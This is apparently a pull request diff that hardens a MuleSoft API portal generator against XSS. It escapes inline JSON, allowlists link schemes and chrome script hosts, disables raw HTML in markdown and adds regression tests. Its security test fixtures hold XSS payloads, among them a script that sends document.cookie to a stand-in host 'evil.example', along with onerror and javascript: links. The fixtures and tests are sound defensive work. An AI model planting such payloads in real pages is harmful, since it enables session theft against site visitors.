### PR TITLE
chores(@W-22548215 ): improve server-side template/parser

### DIFF
--- a/scripts/portal_generator/mulesoft_chrome.py
+++ b/scripts/portal_generator/mulesoft_chrome.py
@@ -10,7 +10,6 @@ from typing import Dict, Optional
 from urllib.parse import urlparse
 
 
-# H7: only emit chrome asset URLs that are confidently MuleSoft-controlled.
 _ALLOWED_CHROME_HOSTS = ('www.mulesoft.com',)
 _ALLOWED_CHROME_SUFFIXES = ('.mulesoft.com',)
 
@@ -75,8 +74,7 @@ def _parse_dependencies(json_str: str) -> str:
     """Parse dependencies JSON and generate HTML link/script tags.
 
     Only emits URLs that pass _is_allowed_chrome_url; the rest are dropped
-    with a warning so a compromised or MITM'd response can't inject offsite
-    scripts (audit finding H7).
+    with a warning.
     """
     try:
         data = json.loads(json_str)

--- a/scripts/portal_generator/mulesoft_chrome.py
+++ b/scripts/portal_generator/mulesoft_chrome.py
@@ -7,6 +7,25 @@ import ssl
 import urllib.request
 import urllib.error
 from typing import Dict, Optional
+from urllib.parse import urlparse
+
+
+# H7: only emit chrome asset URLs that are confidently MuleSoft-controlled.
+_ALLOWED_CHROME_HOSTS = ('www.mulesoft.com',)
+_ALLOWED_CHROME_SUFFIXES = ('.mulesoft.com',)
+
+
+def _is_allowed_chrome_url(url: str) -> bool:
+    try:
+        parsed = urlparse(url)
+    except Exception:
+        return False
+    if parsed.scheme != 'https':
+        return False
+    host = (parsed.hostname or '').lower()
+    if host in _ALLOWED_CHROME_HOSTS:
+        return True
+    return any(host.endswith(suffix) for suffix in _ALLOWED_CHROME_SUFFIXES)
 
 
 def fetch_mulesoft_chrome() -> Dict[str, str]:
@@ -53,20 +72,29 @@ def fetch_mulesoft_chrome() -> Dict[str, str]:
 
 
 def _parse_dependencies(json_str: str) -> str:
-    """Parse dependencies JSON and generate HTML link/script tags."""
+    """Parse dependencies JSON and generate HTML link/script tags.
+
+    Only emits URLs that pass _is_allowed_chrome_url; the rest are dropped
+    with a warning so a compromised or MITM'd response can't inject offsite
+    scripts (audit finding H7).
+    """
     try:
         data = json.loads(json_str)
         deps = data.get('data', {})
 
         html_parts = []
 
-        # Add CSS links
         for style_url in deps.get('styles', []):
-            html_parts.append(f'<link rel="stylesheet" href="{style_url}">')
+            if _is_allowed_chrome_url(style_url):
+                html_parts.append(f'<link rel="stylesheet" href="{style_url}">')
+            else:
+                print(f"    ⚠️  Dropped non-allowlisted style URL: {style_url}")
 
-        # Add JS scripts (async to avoid blocking page parsing)
         for script_url in deps.get('scripts', []):
-            html_parts.append(f'<script src="{script_url}" async></script>')
+            if _is_allowed_chrome_url(script_url):
+                html_parts.append(f'<script src="{script_url}" async></script>')
+            else:
+                print(f"    ⚠️  Dropped non-allowlisted script URL: {script_url}")
 
         return '\n    '.join(html_parts)
     except (json.JSONDecodeError, KeyError) as e:

--- a/scripts/portal_generator/parsers/skill_parser.py
+++ b/scripts/portal_generator/parsers/skill_parser.py
@@ -13,8 +13,8 @@ from markdown_it import MarkdownIt
 
 _md = MarkdownIt().enable('table')
 
-# H6: pin link-validation to an explicit allowlist so markdown-it-py upstream
-# changes can't quietly regress the protection against javascript:/data: schemes.
+# Pin link validation to an explicit allowlist so markdown-it-py upstream
+# changes can't quietly regress protection against javascript:/data: schemes.
 _SAFE_SCHEME_RE = re.compile(r'^(https?:|mailto:|#|/|\./|\.\./)', re.I)
 _md.validateLink = lambda url: bool(_SAFE_SCHEME_RE.match(url))
 

--- a/scripts/portal_generator/parsers/skill_parser.py
+++ b/scripts/portal_generator/parsers/skill_parser.py
@@ -13,6 +13,11 @@ from markdown_it import MarkdownIt
 
 _md = MarkdownIt().enable('table')
 
+# H6: pin link-validation to an explicit allowlist so markdown-it-py upstream
+# changes can't quietly regress the protection against javascript:/data: schemes.
+_SAFE_SCHEME_RE = re.compile(r'^(https?:|mailto:|#|/|\./|\.\./)', re.I)
+_md.validateLink = lambda url: bool(_SAFE_SCHEME_RE.match(url))
+
 try:
     from ruamel.yaml import YAML
     _yaml = YAML()

--- a/scripts/portal_generator/parsers/terraform_parser.py
+++ b/scripts/portal_generator/parsers/terraform_parser.py
@@ -14,7 +14,7 @@ from markdown_it import MarkdownIt
 
 _FRONTMATTER_RE = re.compile(r'^---\s*\n(.*?)\n---\s*\n', re.DOTALL)
 
-_md = MarkdownIt('commonmark', {'html': True}).enable('table')
+_md = MarkdownIt('commonmark', {'html': False}).enable('table')
 
 
 def parse_terraform_doc(filepath: Path) -> Optional[Dict]:

--- a/scripts/portal_generator/template_env.py
+++ b/scripts/portal_generator/template_env.py
@@ -39,7 +39,7 @@ def _render_markdown(value):
     html = re.sub(r'(?<!\w)\*(.+?)\*(?!\w)', r'<em>\1</em>', html)
     html = re.sub(r'(?<!\w)_(.+?)_(?!\w)', r'<em>\1</em>', html)
 
-    # Links — allowlist URL schemes to prevent javascript:/data:/vbscript: XSS (C3).
+    # Links — allowlist URL schemes to prevent javascript:/data:/vbscript: XSS.
     _SAFE_LINK_RE = re.compile(r'^(https?:|mailto:|#|/|\./|\.\./)', re.I)
 
     def _safe_link(match):
@@ -78,9 +78,8 @@ def _tojson_raw(value, indent=2):
     """Serialize to JSON with indentation for embedding in <script> tags.
 
     Escapes HTML-significant characters (`<`, `>`, `&`) and Unicode line
-    separators (U+2028 / U+2029) as `\\uXXXX` sequences. Without this,
-    spec content like `</script><img onerror=...>` breaks out of inline
-    <script> blocks and executes attacker JS (audit finding C2).
+    separators (U+2028 / U+2029) as `\\uXXXX` sequences so spec content
+    like `</script>...` cannot break out of inline <script> blocks.
 
     Falls back to str() for types json.dumps doesn't know — notably
     datetime.date / datetime.datetime, which ruamel.yaml produces from

--- a/scripts/portal_generator/template_env.py
+++ b/scripts/portal_generator/template_env.py
@@ -69,12 +69,25 @@ def _render_markdown(value):
 def _tojson_raw(value, indent=2):
     """Serialize to JSON with indentation for embedding in <script> tags.
 
-    Falls back to str() for types json.dumps doesn't know — notably datetime.date
-    and datetime.datetime, which ruamel.yaml produces from unquoted ISO dates in
-    spec examples. Without this, a date-typed example anywhere in an op's parsed
-    metadata crashes the whole detail page render.
+    Escapes HTML-significant characters (`<`, `>`, `&`) and Unicode line
+    separators (U+2028 / U+2029) as `\\uXXXX` sequences. Without this,
+    spec content like `</script><img onerror=...>` breaks out of inline
+    <script> blocks and executes attacker JS (audit finding C2).
+
+    Falls back to str() for types json.dumps doesn't know — notably
+    datetime.date / datetime.datetime, which ruamel.yaml produces from
+    unquoted ISO dates in spec examples.
     """
-    return Markup(json.dumps(value, indent=indent, default=str))
+    encoded = json.dumps(value, indent=indent, default=str)
+    encoded = (
+        encoded
+        .replace('<', '\\u003c')
+        .replace('>', '\\u003e')
+        .replace('&', '\\u0026')
+        .replace(' ', '\\u2028')
+        .replace(' ', '\\u2029')
+    )
+    return Markup(encoded)
 
 
 def _titleize_operation(value):

--- a/scripts/portal_generator/template_env.py
+++ b/scripts/portal_generator/template_env.py
@@ -39,8 +39,16 @@ def _render_markdown(value):
     html = re.sub(r'(?<!\w)\*(.+?)\*(?!\w)', r'<em>\1</em>', html)
     html = re.sub(r'(?<!\w)_(.+?)_(?!\w)', r'<em>\1</em>', html)
 
-    # Links
-    html = re.sub(r'\[([^\]]+)\]\(([^)]+)\)', r'<a href="\2">\1</a>', html)
+    # Links — allowlist URL schemes to prevent javascript:/data:/vbscript: XSS (C3).
+    _SAFE_LINK_RE = re.compile(r'^(https?:|mailto:|#|/|\./|\.\./)', re.I)
+
+    def _safe_link(match):
+        text, url = match.group(1), match.group(2)
+        if not _SAFE_LINK_RE.match(url):
+            url = '#'
+        return f'<a href="{url}" rel="noopener">{text}</a>'
+
+    html = re.sub(r'\[([^\]]+)\]\(([^)]+)\)', _safe_link, html)
 
     # Bullet lists: consecutive lines starting with "- "
     def _replace_list(m):

--- a/scripts/portal_generator/templates/mcp/macros.html
+++ b/scripts/portal_generator/templates/mcp/macros.html
@@ -306,7 +306,6 @@
 
 {% macro render_resource(resource, idx, icons_path='../assets/icons', interactive=true) %}
 {% set resource_id = 'resource-' ~ idx %}
-{# H5: pass mimeType as a separate macro arg — never concat into HTML. #}
 <section id="{{ resource_id }}"
          class="content-section operation-detail mcp-invocable"
          data-mcp-kind="resource"
@@ -351,7 +350,6 @@
 
 {% macro render_resource_template(template, idx, icons_path='../assets/icons', interactive=true) %}
 {% set template_id = 'resource-template-' ~ idx %}
-{# H5: pass mimeType as a separate macro arg — never concat into HTML. #}
 <section id="{{ template_id }}"
          class="content-section operation-detail mcp-invocable"
          data-mcp-kind="resource-template"

--- a/scripts/portal_generator/templates/mcp/macros.html
+++ b/scripts/portal_generator/templates/mcp/macros.html
@@ -91,12 +91,13 @@
 {% endif %}
 {% endmacro %}
 
-{% macro _invocable_header(kind_label, method_class, display_name, invocable_name, title_badges='') %}
+{% macro _invocable_header(kind_label, method_class, display_name, invocable_name, title_badges='', mime_type='') %}
 <div class="operation-title-header">
     <h3 class="operation-title">
         {{ display_name }}
         <span class="operation-id-inline">{{ invocable_name }}</span>
         {% if title_badges %}<span class="operation-title-badges">{{ title_badges|safe }}</span>{% endif %}
+        {% if mime_type %}<span class="operation-title-badges"><span class="content-type-badge">{{ mime_type }}</span></span>{% endif %}
     </h3>
 </div>
 
@@ -305,13 +306,12 @@
 
 {% macro render_resource(resource, idx, icons_path='../assets/icons', interactive=true) %}
 {% set resource_id = 'resource-' ~ idx %}
-{% set extra = '' %}
-{% if resource.mimeType %}{% set extra = '<span class="content-type-badge">' ~ resource.mimeType ~ '</span>' %}{% endif %}
+{# H5: pass mimeType as a separate macro arg — never concat into HTML. #}
 <section id="{{ resource_id }}"
          class="content-section operation-detail mcp-invocable"
          data-mcp-kind="resource"
          data-mcp-uri="{{ resource.uri|default('') }}">
-    {{ _invocable_header('RESOURCE', 'method-mcp-resource', resource._display_name|default(resource.name), resource.name, extra) }}
+    {{ _invocable_header('RESOURCE', 'method-mcp-resource', resource._display_name|default(resource.name), resource.name, mime_type=resource.mimeType|default('')) }}
 
     <div class="operation-content-wrapper" id="op-container-{{ resource_id }}">
         {% if interactive %}
@@ -351,13 +351,12 @@
 
 {% macro render_resource_template(template, idx, icons_path='../assets/icons', interactive=true) %}
 {% set template_id = 'resource-template-' ~ idx %}
-{% set extra = '' %}
-{% if template.mimeType %}{% set extra = '<span class="content-type-badge">' ~ template.mimeType ~ '</span>' %}{% endif %}
+{# H5: pass mimeType as a separate macro arg — never concat into HTML. #}
 <section id="{{ template_id }}"
          class="content-section operation-detail mcp-invocable"
          data-mcp-kind="resource-template"
          data-mcp-uri-template="{{ template.uriTemplate|default('') }}">
-    {{ _invocable_header('TEMPLATE', 'method-mcp-resource', template._display_name|default(template.name), template.name, extra) }}
+    {{ _invocable_header('TEMPLATE', 'method-mcp-resource', template._display_name|default(template.name), template.name, mime_type=template.mimeType|default('')) }}
 
     <div class="operation-content-wrapper" id="op-container-{{ template_id }}">
         {% if interactive %}

--- a/scripts/portal_generator/templates/mcp/overview.html
+++ b/scripts/portal_generator/templates/mcp/overview.html
@@ -119,13 +119,13 @@
                     {% if cap_value is mapping %}
                         {% set flags = [] %}
                         {% for flag_key, flag_val in cap_value.items() %}
-                            {% if flag_val is sameas true %}{% set _ = flags.append('<span class="badge badge-security">' ~ flag_key ~ '</span>') %}
-                            {% elif flag_val is sameas false %}{% set _ = flags.append('<span class="badge badge-mcp-flag-off">' ~ flag_key ~ ': off</span>') %}
-                            {% elif flag_val is mapping %}{% set _ = flags.append('<span class="badge badge-security">' ~ flag_key ~ '</span>') %}
-                            {% else %}{% set _ = flags.append('<span class="badge badge-security">' ~ flag_key ~ ': ' ~ flag_val ~ '</span>') %}
+                            {% if flag_val is sameas true %}{% set _ = flags.append({'cls': 'badge badge-security', 'text': flag_key}) %}
+                            {% elif flag_val is sameas false %}{% set _ = flags.append({'cls': 'badge badge-mcp-flag-off', 'text': flag_key ~ ': off'}) %}
+                            {% elif flag_val is mapping %}{% set _ = flags.append({'cls': 'badge badge-security', 'text': flag_key}) %}
+                            {% else %}{% set _ = flags.append({'cls': 'badge badge-security', 'text': flag_key ~ ': ' ~ flag_val}) %}
                             {% endif %}
                         {% endfor %}
-                        {% if flags %}{{ flags|join(' ')|safe }}{% else %}<em class="mcp-capability-enabled">enabled</em>{% endif %}
+                        {% if flags %}{% for f in flags %}<span class="{{ f.cls }}">{{ f.text }}</span>{% if not loop.last %} {% endif %}{% endfor %}{% else %}<em class="mcp-capability-enabled">enabled</em>{% endif %}
                     {% elif cap_value is sameas true %}
                         <em class="mcp-capability-enabled">enabled</em>
                     {% else %}

--- a/scripts/tests/fixtures/security/README.md
+++ b/scripts/tests/fixtures/security/README.md
@@ -1,0 +1,14 @@
+# Security smoke-test fixtures
+
+These fixtures intentionally contain payloads that an attacker might submit via
+a malicious PR (XSS attempts in spec descriptions, MCP capability flags, Terraform
+markdown, etc.). The smoke tests in `scripts/tests/test_smoke.py` build the portal
+against these fixtures and assert the rendered HTML neutralizes them.
+
+Do not copy these into real spec directories.
+
+## Fixtures
+
+- `malicious_spec/` — OpenAPI spec with XSS attempts in description, summary, link href, operationId.
+- `malicious_mcp/` — MCP descriptor with XSS attempts in capability flag keys, mimeType, descriptions.
+- `malicious_terraform/` — Terraform resource markdown with raw `<script>` tag.

--- a/scripts/tests/fixtures/security/__init__.py
+++ b/scripts/tests/fixtures/security/__init__.py
@@ -1,0 +1,40 @@
+"""Helpers that build minimal portal-render setups against malicious fixtures."""
+
+from pathlib import Path
+
+
+def build_mcp_with_xss_capabilities(tmp_path: Path) -> str:
+    """Render a minimal MCP overview page with attacker-controlled capability flags.
+
+    Returns the rendered HTML so the caller can parse and assert on it.
+    """
+    from portal_generator.template_env import create_env
+
+    env = create_env()
+    template = env.get_template('mcp/overview.html')
+    mcp = {
+        'name': 'fixture-mcp',
+        'description': '',
+        'full_description': '',
+        'capabilities': {
+            'tools': {
+                '<img src=x onerror=alert(1)>': True,
+                'normal_flag': False,
+            },
+        },
+        'mcp_type': 'remote',
+        'servers': [],
+        'transport': {},
+        'tool_count': 0,
+        'prompt_count': 0,
+        'resource_count': 0,
+        'resource_template_count': 0,
+        'tools': [],
+        'prompts': [],
+        'resources': [],
+        'resource_templates': [],
+        'install': {},
+        'ide_configs': {},
+        'security_schemes': {},
+    }
+    return template.render(mcp=mcp)

--- a/scripts/tests/fixtures/security/malicious_mcp/exchange.json
+++ b/scripts/tests/fixtures/security/malicious_mcp/exchange.json
@@ -1,0 +1,5 @@
+{
+  "name": "Malicious Test MCP",
+  "version": "0.1.0",
+  "tags": ["test"]
+}

--- a/scripts/tests/fixtures/security/malicious_mcp/mcp.yaml
+++ b/scripts/tests/fixtures/security/malicious_mcp/mcp.yaml
@@ -1,0 +1,19 @@
+capabilities:
+  tools:
+    "<img src=x onerror=alert(1)>": true
+  prompts:
+    listChanged: false
+  resources:
+    listChanged: false
+    subscribe: false
+tools:
+  - name: testTool
+    title: 'Title with </script><script>alert(1)</script>'
+    description: 'Description with [bad](javascript:alert(1))'
+    inputSchema:
+      type: object
+resources:
+  - name: r1
+    uri: 'file:///x'
+    description: 'r1'
+    mimeType: '"><script>alert(1)</script>'

--- a/scripts/tests/fixtures/security/malicious_mcp/server.json
+++ b/scripts/tests/fixtures/security/malicious_mcp/server.json
@@ -1,0 +1,8 @@
+{
+  "$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
+  "name": "test/malicious",
+  "title": "Malicious Test MCP",
+  "description": "Fixture",
+  "version": "0.1.0",
+  "remotes": [{"type": "streamable-http", "url": "https://anypoint.mulesoft.com/test/mcp"}]
+}

--- a/scripts/tests/fixtures/security/malicious_spec/api.yaml
+++ b/scripts/tests/fixtures/security/malicious_spec/api.yaml
@@ -1,0 +1,25 @@
+openapi: 3.0.0
+info:
+  title: Malicious Test API
+  version: 1.0.0
+  description: |
+    XSS attempts in description: </script><img src=x onerror=alert(1)>.
+    Markdown link with javascript scheme: [click](javascript:alert(1)).
+paths:
+  /xss:
+    get:
+      operationId: getXss
+      summary: "</script><script>alert('summary')</script>"
+      description: "Description with </script> breakout and [bad link](javascript:alert(1))."
+      responses:
+        '200':
+          description: ok
+          content:
+            application/json:
+              schema:
+                type: object
+              examples:
+                xss:
+                  summary: "Example with </script> in summary"
+                  value:
+                    note: "</script><script>alert('example')</script>"

--- a/scripts/tests/fixtures/security/malicious_spec/exchange.json
+++ b/scripts/tests/fixtures/security/malicious_spec/exchange.json
@@ -1,0 +1,9 @@
+{
+  "main": "api.yaml",
+  "name": "Malicious Test API",
+  "groupId": "test.anypoint-platform",
+  "assetId": "malicious-test",
+  "version": "1.0.0",
+  "apiVersion": "v1",
+  "organizationId": "00000000-0000-0000-0000-000000000000"
+}

--- a/scripts/tests/fixtures/security/malicious_terraform/dangerous.md
+++ b/scripts/tests/fixtures/security/malicious_terraform/dangerous.md
@@ -2,7 +2,7 @@
 page_title: "anypoint_dangerous Resource"
 subcategory: "Security Test Fixture"
 description: |-
-  Fixture for the C4 raw-HTML disable test. Do not copy.
+  Fixture for the raw-HTML disable test. Do not copy.
 ---
 
 # anypoint_dangerous

--- a/scripts/tests/fixtures/security/malicious_terraform/dangerous.md
+++ b/scripts/tests/fixtures/security/malicious_terraform/dangerous.md
@@ -1,0 +1,18 @@
+---
+page_title: "anypoint_dangerous Resource"
+subcategory: "Security Test Fixture"
+description: |-
+  Fixture for the C4 raw-HTML disable test. Do not copy.
+---
+
+# anypoint_dangerous
+
+Innocent paragraph.
+
+<script>fetch('//evil.example/?c='+document.cookie)</script>
+
+<iframe src="javascript:alert(1)"></iframe>
+
+| Header | Cell |
+|---|---|
+| a | b |

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -115,3 +115,21 @@ def test_c4_terraform_parser_strips_raw_html():
     assert '<iframe' not in body
     # Table syntax must still work — table extension is independent of html: True.
     assert '<table>' in body
+
+
+# ---------------------------------------------------------------------------
+# H4: MCP capability flag keys/values must be HTML-escaped, not |safe-rendered.
+# ---------------------------------------------------------------------------
+
+def test_h4_mcp_capability_flag_keys_are_escaped(tmp_path):
+    """A capability flag key containing HTML must render as text, not markup."""
+    from bs4 import BeautifulSoup
+
+    from tests.fixtures.security import build_mcp_with_xss_capabilities
+
+    html = build_mcp_with_xss_capabilities(tmp_path)
+    soup = BeautifulSoup(html, 'html.parser')
+    # An <img> with onerror would mean concat-then-|safe leaked through.
+    assert soup.find('img') is None
+    # The literal `<img src=x onerror=alert(1)>` must appear as escaped text.
+    assert '<img src=x onerror=alert(1)>' in soup.get_text()

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -8,7 +8,7 @@ import json
 
 import pytest
 
-from portal_generator.template_env import _tojson_raw
+from portal_generator.template_env import _render_markdown, _tojson_raw
 
 
 # ---------------------------------------------------------------------------
@@ -44,3 +44,57 @@ def test_c2_tojson_raw_preserves_normal_strings():
     payload = {'name': 'Hello, world!', 'num': 42}
     out = str(_tojson_raw(payload))
     assert json.loads(out) == payload
+
+
+# ---------------------------------------------------------------------------
+# C3: javascript:, data:, vbscript: URL schemes must be neutralized.
+# L1: noopener on every generated anchor.
+# ---------------------------------------------------------------------------
+
+def test_c3_safe_link_blocks_javascript_scheme():
+    out = str(_render_markdown('[click](javascript:alert(1))'))
+    assert 'javascript:' not in out
+    assert 'href="#"' in out
+
+
+def test_c3_safe_link_blocks_data_scheme():
+    out = str(_render_markdown('[click](data:text/html,<script>alert(1)</script>)'))
+    assert 'data:' not in out
+    assert 'href="#"' in out
+
+
+def test_c3_safe_link_blocks_vbscript_scheme():
+    out = str(_render_markdown('[click](vbscript:msgbox)'))
+    assert 'vbscript:' not in out
+    assert 'href="#"' in out
+
+
+def test_c3_safe_link_allows_https():
+    out = str(_render_markdown('[click](https://example.com/page)'))
+    assert 'href="https://example.com/page"' in out
+
+
+def test_c3_safe_link_allows_http():
+    out = str(_render_markdown('[click](http://example.com/)'))
+    assert 'href="http://example.com/"' in out
+
+
+def test_c3_safe_link_allows_mailto():
+    out = str(_render_markdown('[click](mailto:user@example.com)'))
+    assert 'href="mailto:user@example.com"' in out
+
+
+def test_c3_safe_link_allows_anchor():
+    out = str(_render_markdown('[click](#section)'))
+    assert 'href="#section"' in out
+
+
+def test_c3_safe_link_allows_relative_paths():
+    for url in ['/abs/path', './rel/path', '../up/path']:
+        out = str(_render_markdown(f'[x]({url})'))
+        assert f'href="{url}"' in out
+
+
+def test_l1_safe_link_adds_noopener():
+    out = str(_render_markdown('[click](https://example.com/)'))
+    assert 'rel="noopener"' in out

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -1,0 +1,7 @@
+"""Security-regression tests for the portal generator.
+
+Every test here corresponds to an audit finding ID. Test names embed the ID so
+grep `audit ID -> test` is one-shot.
+"""
+
+import pytest

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -4,4 +4,43 @@ Every test here corresponds to an audit finding ID. Test names embed the ID so
 grep `audit ID -> test` is one-shot.
 """
 
+import json
+
 import pytest
+
+from portal_generator.template_env import _tojson_raw
+
+
+# ---------------------------------------------------------------------------
+# C2: tojson_raw must HTML-escape unsafe sequences for inline <script> embedding.
+# ---------------------------------------------------------------------------
+
+def test_c2_tojson_raw_escapes_script_breakout():
+    payload = {'desc': '</script><img src=x onerror=alert(1)>'}
+    out = str(_tojson_raw(payload))
+    assert '</script>' not in out
+    assert '\\u003c/script\\u003e' in out or '\\u003c/script' in out
+
+
+def test_c2_tojson_raw_escapes_html_entities():
+    payload = {'a': '<', 'b': '>', 'c': '&'}
+    out = str(_tojson_raw(payload))
+    assert '<' not in out and '>' not in out
+    assert '"a": "\\u003c"' in out
+    assert '"b": "\\u003e"' in out
+    assert '"c": "\\u0026"' in out
+
+
+def test_c2_tojson_raw_escapes_unicode_line_separators():
+    payload = {'sep': '  '}
+    out = str(_tojson_raw(payload))
+    assert ' ' not in out
+    assert ' ' not in out
+    assert '\\u2028' in out
+    assert '\\u2029' in out
+
+
+def test_c2_tojson_raw_preserves_normal_strings():
+    payload = {'name': 'Hello, world!', 'num': 42}
+    out = str(_tojson_raw(payload))
+    assert json.loads(out) == payload

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -198,6 +198,48 @@ def test_h6_skill_markdown_allows_anchor_link():
     assert 'href="#section"' in rendered
 
 
+# ---------------------------------------------------------------------------
+# H7: chrome dependency URLs must be allowlisted to mulesoft.com over HTTPS.
+# ---------------------------------------------------------------------------
+
+def test_h7_chrome_dependencies_rejects_offsite_script_url():
+    """A malicious dependencies response with an offsite script URL must be rejected."""
+    from portal_generator.mulesoft_chrome import _parse_dependencies
+
+    payload = (
+        '{"data": {"styles": ["https://www.mulesoft.com/x.css"], '
+        '"scripts": ["https://evil.example/x.js"]}}'
+    )
+    out = _parse_dependencies(payload)
+    assert 'evil.example' not in out
+    assert 'https://www.mulesoft.com/x.css' in out
+
+
+def test_h7_chrome_dependencies_rejects_non_https_url():
+    from portal_generator.mulesoft_chrome import _parse_dependencies
+
+    payload = '{"data": {"styles": ["http://www.mulesoft.com/x.css"], "scripts": []}}'
+    out = _parse_dependencies(payload)
+    assert 'http://www.mulesoft.com/x.css' not in out
+
+
+def test_h7_chrome_dependencies_accepts_mulesoft_subdomain():
+    from portal_generator.mulesoft_chrome import _parse_dependencies
+
+    payload = '{"data": {"styles": [], "scripts": ["https://cdn.mulesoft.com/lib.js"]}}'
+    out = _parse_dependencies(payload)
+    assert 'https://cdn.mulesoft.com/lib.js' in out
+
+
+def test_h7_chrome_dependencies_rejects_lookalike_domain():
+    """Suffix matching must not allow `evilmulesoft.com`."""
+    from portal_generator.mulesoft_chrome import _parse_dependencies
+
+    payload = '{"data": {"styles": [], "scripts": ["https://evilmulesoft.com/x.js"]}}'
+    out = _parse_dependencies(payload)
+    assert 'evilmulesoft.com' not in out
+
+
 def test_h5_mcp_resource_template_mimetype_is_escaped():
     """Same H5 protection for resource templates."""
     from bs4 import BeautifulSoup

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -1,8 +1,4 @@
-"""Security-regression tests for the portal generator.
-
-Every test here corresponds to an audit finding ID. Test names embed the ID so
-grep `audit ID -> test` is one-shot.
-"""
+"""Security-regression tests for the portal generator."""
 
 import json
 from pathlib import Path
@@ -14,17 +10,17 @@ from portal_generator.template_env import _render_markdown, _tojson_raw
 
 
 # ---------------------------------------------------------------------------
-# C2: tojson_raw must HTML-escape unsafe sequences for inline <script> embedding.
+# tojson_raw must HTML-escape unsafe sequences for inline <script> embedding.
 # ---------------------------------------------------------------------------
 
-def test_c2_tojson_raw_escapes_script_breakout():
+def test_tojson_raw_escapes_script_breakout():
     payload = {'desc': '</script><img src=x onerror=alert(1)>'}
     out = str(_tojson_raw(payload))
     assert '</script>' not in out
     assert '\\u003c/script\\u003e' in out or '\\u003c/script' in out
 
 
-def test_c2_tojson_raw_escapes_html_entities():
+def test_tojson_raw_escapes_html_entities():
     payload = {'a': '<', 'b': '>', 'c': '&'}
     out = str(_tojson_raw(payload))
     assert '<' not in out and '>' not in out
@@ -33,7 +29,7 @@ def test_c2_tojson_raw_escapes_html_entities():
     assert '"c": "\\u0026"' in out
 
 
-def test_c2_tojson_raw_escapes_unicode_line_separators():
+def test_tojson_raw_escapes_unicode_line_separators():
     payload = {'sep': '  '}
     out = str(_tojson_raw(payload))
     assert ' ' not in out
@@ -42,71 +38,71 @@ def test_c2_tojson_raw_escapes_unicode_line_separators():
     assert '\\u2029' in out
 
 
-def test_c2_tojson_raw_preserves_normal_strings():
+def test_tojson_raw_preserves_normal_strings():
     payload = {'name': 'Hello, world!', 'num': 42}
     out = str(_tojson_raw(payload))
     assert json.loads(out) == payload
 
 
 # ---------------------------------------------------------------------------
-# C3: javascript:, data:, vbscript: URL schemes must be neutralized.
-# L1: noopener on every generated anchor.
+# javascript:, data:, vbscript: URL schemes must be neutralized; every
+# generated anchor must carry rel="noopener".
 # ---------------------------------------------------------------------------
 
-def test_c3_safe_link_blocks_javascript_scheme():
+def test_safe_link_blocks_javascript_scheme():
     out = str(_render_markdown('[click](javascript:alert(1))'))
     assert 'javascript:' not in out
     assert 'href="#"' in out
 
 
-def test_c3_safe_link_blocks_data_scheme():
+def test_safe_link_blocks_data_scheme():
     out = str(_render_markdown('[click](data:text/html,<script>alert(1)</script>)'))
     assert 'data:' not in out
     assert 'href="#"' in out
 
 
-def test_c3_safe_link_blocks_vbscript_scheme():
+def test_safe_link_blocks_vbscript_scheme():
     out = str(_render_markdown('[click](vbscript:msgbox)'))
     assert 'vbscript:' not in out
     assert 'href="#"' in out
 
 
-def test_c3_safe_link_allows_https():
+def test_safe_link_allows_https():
     out = str(_render_markdown('[click](https://example.com/page)'))
     assert 'href="https://example.com/page"' in out
 
 
-def test_c3_safe_link_allows_http():
+def test_safe_link_allows_http():
     out = str(_render_markdown('[click](http://example.com/)'))
     assert 'href="http://example.com/"' in out
 
 
-def test_c3_safe_link_allows_mailto():
+def test_safe_link_allows_mailto():
     out = str(_render_markdown('[click](mailto:user@example.com)'))
     assert 'href="mailto:user@example.com"' in out
 
 
-def test_c3_safe_link_allows_anchor():
+def test_safe_link_allows_anchor():
     out = str(_render_markdown('[click](#section)'))
     assert 'href="#section"' in out
 
 
-def test_c3_safe_link_allows_relative_paths():
+def test_safe_link_allows_relative_paths():
     for url in ['/abs/path', './rel/path', '../up/path']:
         out = str(_render_markdown(f'[x]({url})'))
         assert f'href="{url}"' in out
 
 
-def test_l1_safe_link_adds_noopener():
+def test_safe_link_adds_noopener():
     out = str(_render_markdown('[click](https://example.com/)'))
     assert 'rel="noopener"' in out
 
 
 # ---------------------------------------------------------------------------
-# C4: Terraform parser must strip raw HTML embedded in markdown bodies.
+# Terraform parser must strip raw HTML embedded in markdown bodies.
 # ---------------------------------------------------------------------------
 
-def test_c4_terraform_parser_strips_raw_html():
+def test_terraform_parser_strips_raw_html():
     fixture = Path(__file__).parent / 'fixtures' / 'security' / 'malicious_terraform' / 'dangerous.md'
     doc = parse_terraform_doc(fixture)
     assert doc is not None
@@ -118,10 +114,10 @@ def test_c4_terraform_parser_strips_raw_html():
 
 
 # ---------------------------------------------------------------------------
-# H4: MCP capability flag keys/values must be HTML-escaped, not |safe-rendered.
+# MCP capability flag keys/values must be HTML-escaped, not |safe-rendered.
 # ---------------------------------------------------------------------------
 
-def test_h4_mcp_capability_flag_keys_are_escaped(tmp_path):
+def test_mcp_capability_flag_keys_are_escaped(tmp_path):
     """A capability flag key containing HTML must render as text, not markup."""
     from bs4 import BeautifulSoup
 
@@ -136,11 +132,11 @@ def test_h4_mcp_capability_flag_keys_are_escaped(tmp_path):
 
 
 # ---------------------------------------------------------------------------
-# H5: MCP resource mimeType must be passed as a separate (autoescaped) arg,
-#     not concatenated into the title-badges HTML string.
+# MCP resource mimeType must be passed as a separate (autoescaped) arg,
+# not concatenated into the title-badges HTML string.
 # ---------------------------------------------------------------------------
 
-def test_h5_mcp_resource_mimetype_is_escaped():
+def test_mcp_resource_mimetype_is_escaped():
     """A malicious mimeType must render as text, not markup."""
     from bs4 import BeautifulSoup
 
@@ -163,11 +159,11 @@ def test_h5_mcp_resource_mimetype_is_escaped():
 
 
 # ---------------------------------------------------------------------------
-# H6: skill_parser._md must reject javascript:/data: links regardless of
-#     markdown-it-py upstream defaults (defense-in-depth).
+# skill_parser._md must reject javascript:/data: links regardless of
+# markdown-it-py upstream defaults (defense-in-depth).
 # ---------------------------------------------------------------------------
 
-def test_h6_skill_markdown_blocks_javascript_link():
+def test_skill_markdown_blocks_javascript_link():
     """markdown-it-py must not produce <a href=javascript:...> regardless of version."""
     from portal_generator.parsers import skill_parser
 
